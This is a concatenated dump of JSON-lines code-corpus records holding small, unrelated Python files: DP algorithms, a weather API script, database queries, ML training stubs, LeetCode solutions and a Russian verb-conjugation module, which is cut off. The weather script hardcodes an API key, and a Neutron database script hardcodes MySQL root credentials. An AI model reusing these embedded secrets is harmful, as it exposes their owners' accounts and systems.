1)] for i in range(n + 1)]\nfor i in range(n + 1):\n table[i][i] = 0\n\ns = [[-1 for i in range(n + 1)] for i in range(n + 1)]\n\nfor L in range(2, n + 1):\n for i in range(1, n - L + 2):\n j = i + L - 1\n # table[i][j] = inf\n for k in range(i, j):\n q = table[i][k] + table[k + 1][j] + p[i - 1] * p[k] * p[j]\n if q < table[i][j]:\n table[i][j] = q\n s[i][j] = k\n\nprint(\"Total operation: \", table[1][n])\n\n\ndef print_parentheses(s, i, j):\n if i == j:\n print(\"A%d\" % i, end=\"\")\n else:\n print(\"(\", end=\"\")\n print_parentheses(s, i, s[i][j])\n print_parentheses(s, s[i][j] + 1, j)\n print(\")\", 
end=\"\")\n\n\nprint(\"Multiplication order: \", end=\"\")\nprint_parentheses(s, 1, n)\n","sub_path":"DP_matrix_chain_multiplication.py","file_name":"DP_matrix_chain_multiplication.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"360362931","text":"import requests\r\nimport math\r\nimport datetime\r\nfrom states import *\r\n\r\nfilename = 'weatherdata.txt'\r\nwith open(filename, 'a') as file_object:\r\n file_object.write(f\"\\t\\t\\t\\t\\t\\t{'-' * 15}SEARCH HISTORY...{'-' * 15}\\n\")\r\n\r\n\r\ndef info_tech(shadow_location):\r\n \"\"\"user input, file storage\"\"\"\r\n shadow_date_time = datetime.datetime.now().strftime(\"%d %b %Y | %I:%M:%S %p\")\r\n shadow_api_key = '87d845b0b6cf29baa1a73cc34b067a95'\r\n shadow_url = f\"https://api.openweathermap.org/data/2.5/weather?q={shadow_location}&appid={shadow_api_key}\"\r\n shadow_api_link = requests.get(shadow_url)\r\n shadow_data = shadow_api_link.json()\r\n shadow_description = shadow_data['weather'][0]['description']\r\n shadow_temp = shadow_data['main']['temp']\r\n shadow_temp_f = math.floor((shadow_temp * 1.8) - 459.67)\r\n shadow_temp_c = math.floor((shadow_temp_f - 32) * 5 / 9)\r\n shadow_temp_feel = data['main']['feels_like']\r\n shadow_temp_feel = math.floor((shadow_temp_feel * 1.8) - 459.67)\r\n shadow_temp_feel = math.floor((shadow_temp_feel - 32) * 5 / 9)\r\n print(f\"Weather Stats for: {shadow_location} Date-Time: {shadow_date_time}\")\r\n print(f\"Weather: {shadow_description}\\ntemperature: {shadow_temp_f}{chr(176)}F \"\r\n f\"or {shadow_temp_c}{chr(176)}C\\nFeels like: {shadow_temp_feel}{chr(176)}C\\n\")\r\n filename = 'weatherdata.txt'\r\n with open(filename, 'a') as file_object:\r\n file_object.write(f\"Weather Stats for: {shadow_location} Date-Time: {shadow_date_time}\")\r\n file_object.write(f\"Weather: {shadow_description}\\ntemperature: {shadow_temp_f}degreeF \"\r\n f\"or 
{shadow_temp_c}degreeC\\nFeels like: {shadow_temp_feel}degreeC\\n\\n\\n\")\r\n\r\n\r\ndate_time = datetime.datetime.now().strftime(\"%d %b %Y | %I:%M:%S %p\")\r\nlist_1 = []\r\nlist_2 = ['Weather Stats for', 'Date-Time', 'Weather', 'temperature', 'Feels like']\r\ndict_1 = {}\r\n\r\nfor i in states:\r\n API_key = '87d845b0b6cf29baa1a73cc34b067a95'\r\n url = f\"https://api.openweathermap.org/data/2.5/weather?q={i}&appid={API_key}\"\r\n api_link = requests.get(url)\r\n data = api_link.json()\r\n description = data['weather'][0]['description']\r\n temp = data['main']['temp']\r\n temp_f = math.floor((temp * 1.8) - 459.67)\r\n temp_c = math.floor((temp_f - 32) * 5 / 9)\r\n temp_feel = data['main']['feels_like']\r\n temp_feel = math.floor((temp_feel * 1.8) - 459.67)\r\n temp_feel = math.floor((temp_feel - 32) * 5 / 9)\r\n str_1 = f\"{temp_f}{chr(176)}F or {temp_c}{chr(176)}C\"\r\n str_2 = f\"{temp_feel}{chr(176)}C\"\r\n\r\n list_3 = [i.upper(), date_time, description, str_1, str_2]\r\n dict_3 = {}\r\n for j in range(0, 5):\r\n key_0 = list_2[j] # ['Weather Stats for', 'Date-Time', 'Weather', 'temperature', 'Feels like']\r\n value_0 = list_3[j] # [i.upper(), date_time, description, str_1, str_2]\r\n dict_1[key_0] = value_0\r\n dict_3 = dict_1.copy()\r\n\r\n list_1.append(dict_3)\r\n\"\"\"final printing\"\"\"\r\nfor i in range(0, len(list_1) - 1):\r\n dict_2 = list_1[i]\r\n c = dict_2.keys()\r\n c = list(c)\r\n print(f\"{c[0]}: {dict_2[c[0]]} {c[1]}: {dict_2[c[1]]}\")\r\n print(f\"{c[2]}: {dict_2[c[2]]}\\n{c[3]}: {dict_2[c[3]]}\\n{c[4]}: {dict_2[c[4]]}\\n\")\r\n\r\nfor i in states:\r\n print(i)\r\nwhile True:\r\n resp1 = input(\"search any other state or city: \")\r\n info_tech(resp1)\r\n","sub_path":"requestmodule.py","file_name":"requestmodule.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"487577958","text":"import sqlite3, datetime, time\n\nconnection = 
sqlite3.connect('tutorial.db')\nc = connection.cursor()\n\nidade = int(input('digita idade '))\nnome = input('digita nome ')\n\nsql2 =\"select * from dados where keyword = ? and value = ?\"\n\ndef read_data(wordUser, aqui):\n for row in c.execute(sql2, (wordUser, aqui,)):\n print(row)\n\nread_data(nome, idade)","sub_path":"banco/sqlite_bd_select.py","file_name":"sqlite_bd_select.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"422729144","text":"import torch\nfrom train_model_class import Model\n\n# Check device availability\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nprint(\"You are using device: %s\" % device)\n\nclass Args:\n def __init__(self, mode: str='rgb', exp_name: str=\"hmdb-test\", batch_size: int=32, length: int=32, \n learnable: str=\"[0,1,1,1,1]\", niter: int=20, system: str=\"hmdb\", model: str=\"3d\"):\n self.mode = mode\n self.exp_name = exp_name\n self.batch_size = batch_size\n self.length = length\n self.learnable = learnable\n self.niter = niter\n self.system = system\n self.model = model\n \n \n# args = Args(mode=\"rgb\", exp_name=\"hmdb-test\", batch_size=32, length=32, learnable=\"[0,1,1,1,1]\", niter=20, system=\"hmdb\", model=\"3d\")\nargs = Args()\nmodel = Model(device)\n\nmodel.train(args)\n","sub_path":"project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"608213881","text":"'''\nCreated on 5 déc. 
2018\n\n@author: coline\n'''\nfrom audioop import max\nwith open(\"fichier_similarite_test_3.txt\", 'r') as fichier :\n ligne = \" \"\n dict = {}\n while len(ligne) != 0 :\n ligne1 = fichier.readline()\n ligne2 = fichier.readline()\n element1 = ligne1[:len(ligne1)-1]\n element2 = ligne2[:len(ligne2)-1]\n print(element1)\n print(element2)\n \n for i in range(2) :\n fichier.readline()\n \n ligne = fichier.readline()\n sim = ligne[:len(ligne)-1].split(\":\")[1]\n dict.update({(element1, element2) : sim})\n ligne = fichier.readline()\n \n print(dict)\n \n compteur = 0\n max = 0 \n pos_max = 0\n for elt in dict.keys() :\n if elt[0] == 'fichier_1FJG_A_48_8' or elt[1] == 'fichier_1FJG_A_48_8' :\n print(elt)\n print(dict[elt])\n compteur += 1\n if float(dict[elt]) > max and float(dict[elt]) < 1.0:\n max = float(dict[elt])\n pos_max = elt\n \n print(compteur)\n print(pos_max)\n print(max)\n \n \n ","sub_path":"recup.py","file_name":"recup.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"312835751","text":"#!/usr/bin/env python\n#\n# Copyright 2016 luckylau \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nfrom sqlalchemy import create_engine\nfrom neutron.db import models_v2\nfrom sqlalchemy.orm import exc\nimport sqlalchemy.orm\nimport sys\nimport 
db_logging\n\nDomain=\"olsodb\"\ndb_logging.rpc_log_prepare(Domain)\nLOG=db_logging.logname(__name__)\n\n_ENGINE=None\n_SESSION_MAKER=None\n\n'''Get the engine and session from sqlalchemy'''\ndef get_engine():\n global _ENGINE\n if _ENGINE is not None:\n return _ENGINE\n _ENGINE=create_engine(\"mysql+mysqldb://root:rootdb@10.0.36.176:3306/neutron\",echo=True)\n return _ENGINE\n\ndef get_session_maker(engine):\n global _SESSION_MAKER\n if _SESSION_MAKER is not None:\n return _SESSION_MAKER\n _SESSION_MAKER=sqlalchemy.orm.sessionmaker(bind=engine)\n return _SESSION_MAKER\n\n\n'''Get the session'''\ndef get_session():\n engine=get_engine()\n maker=get_session_maker(engine)\n session=maker()\n return session\n\nclass Connection(object):\n\n def __init__(self):\n pass\n def get_port(self,mac_address):\n query=get_session().query(models_v2.Port).filter_by(mac_address=mac_address)\n try:\n port_details=query.one()\n except exc.NoResultFound:\n LOG.error(\"error.....\")\n return port_details\n\ndef main():\n LOG.info(\"========main=========\")\n mac_address=\"fa:16:3e:20:37:2e\"\n connection=Connection()\n port_details=connection.get_port(mac_address)\n LOG.info(\"port_details %s\" %(port_details))\n\nif __name__ == '__main__':\n sys.exit(main())","sub_path":"openstack/sqlalchemy.orm/db_query_ports.py","file_name":"db_query_ports.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"44910764","text":"# 给定 n 个非负整数表示每个宽度为 1 的柱子的高度图,计算按此排列的柱子,下雨之后能接多少雨水。 \n# \n# \n# \n# 上面是由数组 [0,1,0,2,1,0,1,3,2,1,2,1] 表示的高度图,在这种情况下,可以接 6 个单位的雨水(蓝色部分表示雨水)。 感谢 Mar\n# cos 贡献此图。 \n# \n# 示例: \n# \n# 输入: [0,1,0,2,1,0,1,3,2,1,2,1]\n# 输出: 6 \n# Related Topics 栈 数组 双指针 \n# 👍 1505 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nclass Solution:\n def trapBad(self, height: List[int]) -> int:\n \"\"\"\n 按列找 对每个柱子分别找出其左右侧最高值 时间复杂度O(n^2)\n 找左侧最大值无需单独进行一次遍历\n \"\"\"\n areas = 0\n 
max_left = 0\n for i in range(1, len(height) - 1):\n # max_left = 0\n # for j in range(0, i): # 与上层for同向且步长相等,可优化\n # max_left = max(height[j], max_left)\n max_left = max(max_left, height[i - 1])\n max_right = 0\n for j in range(i + 1, len(height)):\n max_right = max(height[j], max_right)\n max_lower = min(max_left, max_right)\n areas += max(max_lower - height[i], 0)\n return areas\n\n def trapGood(self, height: List[int]) -> int:\n \"\"\"\n 动态规划法 对法一找左右侧最大值的方式进行优化 时间复杂度O(n) 空间复杂度O(n)\n \"\"\"\n areas = 0\n max_right = [0] * len(height)\n max_left = 0\n # max_left = [0] * len(height)\n # for i in range(1, len(height) - 1):\n # max_left[i] = max(max_left[i - 1], height[i - 1])\n for i in range(len(height) - 2, 0, -1):\n max_right[i] = max(max_right[i + 1], height[i + 1])\n for i in range(1, len(height) - 1):\n max_left = max(max_left, height[i - 1])\n # areas += max(min(max_left[i], max_right[i]) - height[i], 0)\n areas += max(min(max_left, max_right[i]) - height[i], 0)\n return areas\n\n def trap(self, height: List[int]) -> int:\n \"\"\"\n 双指针法 结合上述两种方法 时间复杂度o(n)\n \"\"\"\n res = 0\n max_left, max_right = 0, 0\n i, j = 1, len(height) - 2\n while i <= j:\n max_left = max(max_left, height[i - 1])\n max_right = max(max_right, height[j + 1])\n if max_left < max_right:\n res += max(max_left - height[i], 0)\n i += 1\n else:\n res += max(max_right - height[j], 0)\n j -= 1\n return res\n\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"Week_01/day7_[42]接雨水_homework.py","file_name":"day7_[42]接雨水_homework.py","file_ext":"py","file_size_in_byte":2749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"104508512","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport consts\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"Label images.\",\n formatter_class=argparse.RawTextHelpFormatter)\n\nparser.add_argument(\"--images\", dest=\"images\", metavar=\"F\", type=str, default=consts.IMAGES_PATH,\n help=\"Path to images (default: %s)\" % consts.IMAGES_PATH)\n\nargs = parser.parse_args()\n\nfrom common import logger, PatchArray, Visualize\n\ndef relabel():\n # Check parameters\n if args.images == \"\" or not os.path.exists(args.images) or not os.path.isdir(args.images):\n logger.error(\"Specified path does not exist (%s)\" % args.images)\n return\n\n # Load the file\n patches = PatchArray(args.images)\n\n # Visualize\n vis = Visualize(patches, images_path=args.images)\n vis.pause = True\n vis.show()\n\nif __name__ == \"__main__\":\n relabel()\n pass","sub_path":"anomaly_detector/scripts/02_relabel.py","file_name":"02_relabel.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"149577782","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Aug 30 00:15:02 2017\n\n@author: owen\n\"\"\"\n\n#class Solution(object):\n# def matrixReshape(self, nums, r, c):\n# \"\"\"\n# :type nums: List[List[int]]\n# :type r: int\n# :type c: int\n# :rtype: List[List[int]]\n# \"\"\"\n# m=len(nums)\n# n=len(nums[0])\n# if m*n!=r*c:\n# return nums\n# # WRONG!! 
res=[[None]*c]*r\n# # res=[[None for _ in range(c)] for _ in range(r)]\n# res=[[None]*c for _ in range(r)]\n# for i in range(r*c):\n# res[i//c][i%c]=nums[i//n][i%n]\n# return res\n\nclass Solution:\n def matrixReshape(self, nums, r, c):\n \"\"\"\n :type nums: List[List[int]]\n :type r: int\n :type c: int\n :rtype: List[List[int]]\n \"\"\"\n m=len(nums)\n n=len(nums[0])\n if m*n!=r*c:\n return nums\n res=[[None]*c for _ in range(r)]\n row=col=0\n for i in range(m):\n for j in range(n):\n res[row][col]=nums[i][j]\n col+=1\n if col==c:\n row+=1\n col=0\n return res\n \nif __name__==\"__main__\":\n nums = [[1,2],[3,4]]\n print(Solution().matrixReshape(nums,1,4))\n print(Solution().matrixReshape(nums,2,4))\n print(Solution().matrixReshape(nums,4,1))","sub_path":"566. Reshape the Matrix.py","file_name":"566. Reshape the Matrix.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"377237112","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nfrom sys import stdin\r\n\r\nimport time\r\nfd = open('a.txt')\r\nstdin = fd\r\nstart=time.time()\r\n\r\n############################################\r\n\r\n\r\n# read data for n sequences.\r\nn = stdin.readline().split()\r\na = int(n[0])\r\nb = int(n[1])\r\nc = int(n[2])\r\n#data = [int(stdin.readline().rstrip()) for _ in range(n)]\r\n\r\nout = int(b / a)\r\n\r\nif out > c:\r\n out = c\r\n\r\nprint(out)\r\n\r\nend = time.time()\r\nprint(end-start)","sub_path":"abc123/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"150553564","text":"import tensorflow as tf\n\ndef fullyConnectedLayer(input_feature, output_dim=None, name=\"fullyConnectedLayer\"):\n with tf.variable_scope(name):\n weights = tf.get_variable(name=\"weights\", shape=[input_feature.get_shape().as_list()[1], output_dim], dtype=tf.float32, 
initializer=tf.random_normal_initializer(mean=0.0, stddev=0.02))\n biases = tf.get_variable(name=\"biases\", shape=[output_dim], dtype=tf.float32, initializer=tf.constant_initializer(0.0))\n return tf.matmul(input_feature, weights) + biases\n\ndef convolutionLayer(input_feature, filter_shape=None, stride_shape=None, name=\"convolutionLayer\"):\n with tf.variable_scope(name):\n weights = tf.get_variable(name=\"weights\", shape=filter_shape, dtype=tf.float32, initializer=tf.truncated_normal_initializer(mean=0.0, stddev=0.02))\n biases = tf.get_variable(name=\"biases\", shape=[filter_shape[-1]], dtype=tf.float32, initializer=tf.constant_initializer(0.0))\n z = tf.nn.conv2d(input_feature, weights, strides=stride_shape, padding=\"SAME\")\n z = tf.reshape(tf.nn.bias_add(z, biases), z.get_shape())\n return z\n\ndef transConvolutionLayer(input_feature, filter_shape=None, stride_shape=None, output_shape=None, name=\"transConvolutionLayer\"):\n with tf.variable_scope(name):\n weights = tf.get_variable(name=\"weights\", shape=filter_shape, dtype=tf.float32, initializer=tf.random_normal_initializer(mean=0.0, stddev=0.02))\n biases = tf.get_variable(name=\"biases\", shape=[output_shape[-1]], dtype=tf.float32, initializer=tf.constant_initializer(0.0))\n z = tf.nn.conv2d_transpose(input_feature, weights, output_shape=output_shape, strides=stride_shape, padding=\"SAME\")\n z = tf.reshape(tf.nn.bias_add(z, biases), z.get_shape())\n return z\n\ndef batchNormLayer(input_feature, is_training, name=\"batchNormLayer\"):\n with tf.variable_scope(name):\n return tf.contrib.layers.batch_norm(input_feature, decay=0.9, center=True, scale=True, epsilon=1e-5, updates_collections=None, is_training=is_training)\n","sub_path":"GAN/opt.py","file_name":"opt.py","file_ext":"py","file_size_in_byte":2040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"649237243","text":"'''\r\nCopyright (c) 2017 Leonardo MW Ltd\r\n\r\nPermission is hereby 
granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software in a limited manner. Permissions to publish, distribute, sublicense or sell the Software are not granted. Permissions granted are: the rights to use, copy, modify and merge copies of the Software solely within the context of the \"Rampaging Chariots\" educational project, and subject to the following conditions:\r\n\r\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\r\n'''\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.animation as animation\r\n\r\n\r\ndef update_line(num, data, line):\r\n line.set_data(data[..., :num])\r\n return line,\r\n\r\nfig1 = plt.figure()\r\n\r\ndata = np.random.rand(2, 25)\r\nl, = plt.plot([], [], 'r-')\r\nplt.xlim(0, 1)\r\nplt.ylim(0, 1)\r\nplt.xlabel('x')\r\nplt.title('test')\r\nline_ani = animation.FuncAnimation(fig1, update_line, 25, fargs=(data, l),\r\n interval=50, blit=True)\r\n#line_ani.save('lines.mp4')\r\n\r\nfig2 = plt.figure()\r\n\r\nx = np.arange(-9, 10)\r\ny = np.arange(-9, 10).reshape(-1, 1)\r\nbase = np.hypot(x, y)\r\nims = []\r\nfor add in np.arange(15):\r\n ims.append((plt.pcolor(x, y, base + add, norm=plt.Normalize(0, 30)),))\r\n\r\nim_ani = animation.ArtistAnimation(fig2, ims, interval=50, repeat_delay=3000,\r\n blit=True)\r\n#im_ani.save('im.mp4', 
metadata={'artist':'Guido'})\r\n\r\nplt.show()\r\n","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"199210610","text":"# coding=utf-8\n\nfrom irregular_verb import *\n\ndef is_vowel(c):\n\treturn c == u'я' or c == u'е' or c == u'и' or c == u'ё' or c == u'ю' or c == u'а' or c == u'э' or c == u'ы' or c == u'о' or c == u'у'\n\ndef is_hard_vowel(c):\n\treturn c == u'а' or c == u'э' or c == u'ы' or c == u'о' or c == u'у'\n\ndef is_soft_vowel(c):\n\treturn c == u'я' or c == u'е' or c == u'и' or c == u'ё' or c == u'ю'\n\ndef soften_vowel(c):\n\tif c == u'а':\n\t\treturn u'я'\n\telif c == u'ы':\n\t\treturn u'и'\n\telif c == u'у':\n\t\treturn u'ю'\n\telse:\n\t\treturn c\n\ndef is_consonant(c):\n\treturn not is_vowel(c)\n\ndef is_consonant_exclude_yot(c):\n\treturn is_consonant(c) and c != u'й'\n\ndef count_vowels(word):\n\tcount = 0\n\tfor c in word:\n\t\tif is_vowel(c):\n\t\t\tcount += 1\n\treturn count\n\ndef first_vowel(word):\n\tfor i in range(0, len(word)):\n\t\tif is_vowel(word[i]):\n\t\t\treturn i\n\treturn -1\n\ndef last_vowel(word):\n\tfor i in range(len(word) - 1, 0, -1):\n\t\tif is_vowel(word[i]):\n\t\t\treturn i\n\treturn -1\n\ndef previous_vowel(word, pos):\n\ti = pos\n\twhile i > 0:\n\t\ti -= 1\n\t\tif is_vowel(word[i]):\n\t\t\treturn i\n\treturn pos\n\ndef last_consonant_cluster(word):\n\tif len(word) == 0 or is_consonant(word[-1]):\n\t\treturn ''\n\telse:\n\t\tstart = previous_vowel(word, len(word) - 1)\n\t\tif start == -1:\n\t\t\treturn ''\n\t\telse:\n\t\t\treturn word[start + 1:-1]\n\n\"\"\"\n0 for invalid verb stem\n1 for first conjugation\n2 for second conjugation\n\"\"\"\ndef conjugation_type(verb_stem):\n\tif len(verb_stem) < 2:\n\t\treturn 0\n\telif verb_stem[-1] == u'и' or verb_stem[-1] == u'е' or verb_stem[-2:] == u'жа' or verb_stem[-1] == u'я':\n\t\treturn 2\n\telse:\n\t\treturn 1\n\ndef 
is_irregular(verb_stem):\n\treturn (len(verb_stem) >= 4 and verb_stem[-4:] == u'мочь') or verb_stem == u'хотеть' or verb_stem == u'дать' or verb_stem == u'быть' or verb_stem == u'есть' or verb_stem == u'идти'\n\ndef mutate_consonant(word):\n\tif len(word) > 3 and (word[-3:] == u\"ова\" or word[-3:] == u\"ева\"):\n\t\treturn word[:-3] + u\"уй\"\n\n\tif len(word) > 4 and (word[-4:] == u\"авай\"):\n\t\treturn word[:-4] + u\"ай\"\n\n\tcluster = last_consonant_cluster(word)\n\tif len(cluster) > 0:\n\t\tif cluster[-1] == u'д' or cluster == u'г' or cluster == u'з':\n\t\t\treturn word[:-2] + u'ж' + word[-1]\n\t\telif cluster == u'т':\n\t\t\treturn word[:-2] + u'ч' + word[-1]\n\t\telif cluster == u'с':\n\t\t\treturn word[:-2] + u'ш' + word[-1]\n\t\telif cluster == u'б' or cluster == u'п':\n\t\t\treturn word[:-1] + u'л' + word[-1]\n\t\telif cluster == u'ст':\n\t\t\treturn word[:-3] + u'щ' + word[-1]\n\t\t\t\t\n\treturn word\n\ndef apply_spelling_rules(word):\n\tfor i in range(0, len(word) - 1):\n\t\tc = word[i]\n\t\tnext_c = word[i + 1]\n\t\t\n\t\t# replace ы with и after к, г, х, ш, ж, ч, and щ\n\t\tif c == u'к' or c == u'г' or c == u'х' or c == u'ш' or c == u'ж' or c == u'ч' or c == u'щ':\n\t\t\tif next_c == u'ы':\n\t\t\t\tword = word[:i + 1] + u'и' + word[i + 2:]\n\n\t\t# replace я with а and ю with у after к, г, х, ш, ж, ч, щ, and ц\n\t\tif c == u'к' or c == u'г' or c == u'х' or c == u'ш' or c == u'ж' or c == u'ч' or c == u'щ' or c == u'ц':\n\t\t\tif next_c == u'я':\n\t\t\t\tword = word[:i + 1] + u'а' + word[i + 2:]\n\t\t\telif next_c == u'ю':\n\t\t\t\tword = word[:i + 1] + u'у' + word[i + 2:]\n\n\t\t# replace unstressed о with е after ш, ж, ч, щ, and ц\n\t\tif c == u'ш' or c == u'ж' or c == u'ч' or c == u'щ' or c == u'ц':\n\t\t\tif next_c == u'о' and verb_copy.stress_pos != i + 1:\n\t\t\t\tword = word[:i + 1] + u'е' + word[i + 2:]\n\t\n\treturn word\n\ndef verb_ending(conj_type, person, singular, gender, past):\n\tif not past:\n\t\tvowel = u'ё' if (conj_type == 1) else 
u'и'\n\t\tvowel_3p_plural = u'у' if (conj_type == 1) else u'а'\n\t\tif person == 1:\n\t\t\tif singular:\n\t\t\t\treturn u'у'\n\t\t\telse:\n\t\t\t\treturn vowel + u'м'\n\t\telif person == 2:\n\t\t\tif singular:\n\t\t\t\treturn vowel + u'шь'\n\t\t\telse:\n\t\t\t\treturn vowel + u'те'\n\t\telif person == 3:\n\t\t\tif singular:\n\t\t\t\treturn vowel + u'т'\n\t\t\telse:\n\t\t\t\treturn vowel_3p_plural + u'т'\n\telse:\n\t\tif singular:\n\t\t\tif gender == 0:\n\t\t\t\treturn u'л'\n\t\t\telif gender == 1:\n\t\t\t\treturn u'ла'\n\t\t\telif gender == 2:\n\t\t\t\treturn u'ло'\n\t\telse:\n\t\t\treturn u'ли'\n\n\treturn ''\n\ndef add_ending(verb_stem, verb_ending):\n\tif len(verb_stem) == 0 or len(verb_ending) == 0:\n\t\treturn verb_stem + verb_ending\n\n\tlast_c_of_stem = verb_stem[-1]\n\trest_of_stem = verb_stem[:-1]\n\n\tfirst_c_of_end = verb_ending[0]\n\trest_of_end = verb_ending[1:]\n\n\tif last_c_of_stem == u'й':\n\t\tif is_hard_vowel(first_c_of_end):\n\t\t\t# yot + hard vowel = soft vowel\n\t\t\treturn rest_of_stem + soften_vowel(first_c_of_end) + rest_of_end\n\t\telif first_c_of_end == u'ё':\n\t\t\t# yot + ё = е\n\t\t\treturn rest_of_stem + u'е' + rest_of_end\n\t\telif is_consonant(first_c_of_end):\n\t\t\t# yot + consonant = consonant\n\t\t\treturn rest_of_stem + verb_ending\n\telif is_consonant(last_c_of_stem):\n\t\tif is_consonant(first_c_of_end):\n\t\t\t# consonant_1 + consonant_2 = consonant_2\n\t\t\treturn rest_of_stem + verb_ending\n\t\telse:\n\t\t\treturn verb_stem + verb_ending\n\telif is_hard_vowel(last_c_of_stem):\n\t\tif is_hard_vowel(first_c_of_end):\n\t\t\t# hard_1 + hard_2 = hard_2\n\t\t\treturn rest_of_stem + verb_ending\n\t\telif first_c_of_end == u'ё':\n\t\t\t# hard_1 + ё = е\n\t\t\treturn rest_of_stem + u'е' + rest_of_end\n\t\telse:\n\t\t\treturn verb_stem + verb_ending\n\telif is_soft_vowel(last_c_of_stem):\n\t\tif is_consonant(first_c_of_end):\n\t\t\t# soft vowel + consonant = unchanged\n\t\t\treturn verb_stem + verb_ending\n\t\telse:\n\t\t\t# soft_1 
+ hard_2 = soft_2\n\t\t\t# soft_1 + soft_2 = soft_2\n\t\t\treturn rest_of_stem + soften_vowel(first_c_of_end) + rest_of_end\n\ndef format_stress_mark(word):\n\tstress_pos = word.find(\"'\")\n\tif stress_pos != -1:\n\t\tif word.find(u'ё') != -1 or count_vowels(word) == 1:\n\t\t\treturn word[:stress_pos] + word[stress_pos + 1:]\n\t\telse:\n\t\t\treturn word[:stress_pos] + u'\\u0301' + word[stress_pos + 1:]\n\treturn word\n\ndef conjugate_verb(verb_stem, person, singular, gender, past, stress_type):\n\t# this check makes sure that later calls to verb_stem[-1] are valid\n\tif len(verb_stem) == 0:\n\t\treturn ''\n\n\tif is_irregular(verb_stem):\n\t\treturn conjugate_irregular_verb(verb_stem, person = person, singular = singular, gender = gender, past = past)\n\n\t# make sure stress is marked, whether explicitly (by an apostrophe) or implicitly\n\tstress_pos = verb_stem.find(\"'\")\n\tif stress_pos == -1:\n\t\tyo_pos = verb_stem.find(u'ё')\n\t\tif yo_pos != -1:\n\t\t\tstress_pos = yo_pos\n\t\telif count_vowels(verb_stem) == 1:\n\t\t\tstress_pos = first_vowel(verb_stem)\n\t\telse:\n\t\t\treturn ''\n\telse:\n\t\t# make sure stress mark is in the right place for ова- and ева- verbs with stressed endings\n\t\tif len(verb_stem) >= 4 and (verb_stem[-4:] == u\"ова'\" or verb_stem[-4:] == u\"ева'\") and not past:\n\t\t\tstress_pos = len(verb_stem) - 4\n\n\t\t# remove the stress mark, for the time being\n\t\tverb_stem = verb_stem.replace(\"'\", '')\n\n\tconj_type = conjugation_type(verb_stem)\n\tif conj_type == 0:\n\t\treturn ''\n\n\t# mutate consonant in 1p sing. 
non-past for 2nd conj verbs, and all non-past forms for 1st conj verbs\n\tif not past:\n\t\tif (conj_type == 2 and person == 1 and singular) or conj_type == 1:\n\t\t\tverb_stem = mutate_consonant(verb_stem)\n\n\tverb_with_ending = add_ending(verb_stem, verb_ending(conj_type, person = person, singular = singular, gender = gender, past = past))\n\n\t# apply spelling rules\n\tverb_with_ending = apply_spelling_rules(verb_with_ending)\n\n\t# consonant stems have absolute end stress in non-past\n\tif is_consonant_exclude_yot(verb_stem[-1]) and not past:\n\t\tstress_pos = last_vowel(verb_with_ending)\n\n\t# 2 indicates mobile stress\n\tif stress_type == 2:\n\t\tif is_consonant_exclude_yot(verb_stem[-1]):\n\t\t\t# consonant stems have absolute end stress in past feminine\n\t\t\tif past and gender == 1:\n\t\t\t\tstress_pos = len(verb_with_ending)\n\t\t# all other stems shift stress in all non-past forms except the first person singular\n\t\telif (person != 1 or not singular) and not past:\n\t\t\tstress_pos = previous_vowel(verb_with_ending, stress_pos - 1) + 1\n\n\t# re-insert the stress mark, if the verb does not contain the stressed letter ё\n\tif 